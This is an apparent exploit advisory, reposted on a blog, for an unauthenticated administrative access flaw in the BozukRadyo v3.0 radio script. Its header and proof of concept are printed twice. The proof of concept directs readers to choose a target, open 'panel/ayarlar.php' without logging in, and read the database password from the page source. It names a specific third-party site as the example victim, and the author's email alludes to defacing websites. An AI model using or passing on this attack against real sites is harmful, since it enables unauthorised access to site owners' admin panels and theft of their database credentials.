========================================================================
| # Title : BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability
| # Author : Cyclo'sTextovert
| # email : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : v3.0
| # Vendor : http://wmscripti.com/php-scriptler/bozukradyo-v3-radyo-scripti.html
| # Dork : n/a
========================================================================
poc :
choose a target and add payload "panel/ayarlar.php"
1 - http://hitmusic.gen.tr/panel/ayarlar.php
2 - open pag source in line 121 to found pass of databass encrypted
| # Title : BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability
| # Author : Cyclo'sTextovert
| # email : defacertersakiti@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : v3.0
| # Vendor : http://wmscripti.com/php-scriptler/bozukradyo-v3-radyo-scripti.html
| # Dork : n/a
========================================================================
poc :
choose a target and add payload "panel/ayarlar.php"
1 - http://hitmusic.gen.tr/panel/ayarlar.php
2 - open pag source in line 121 to found pass of databass encrypted
Komentar
Posting Komentar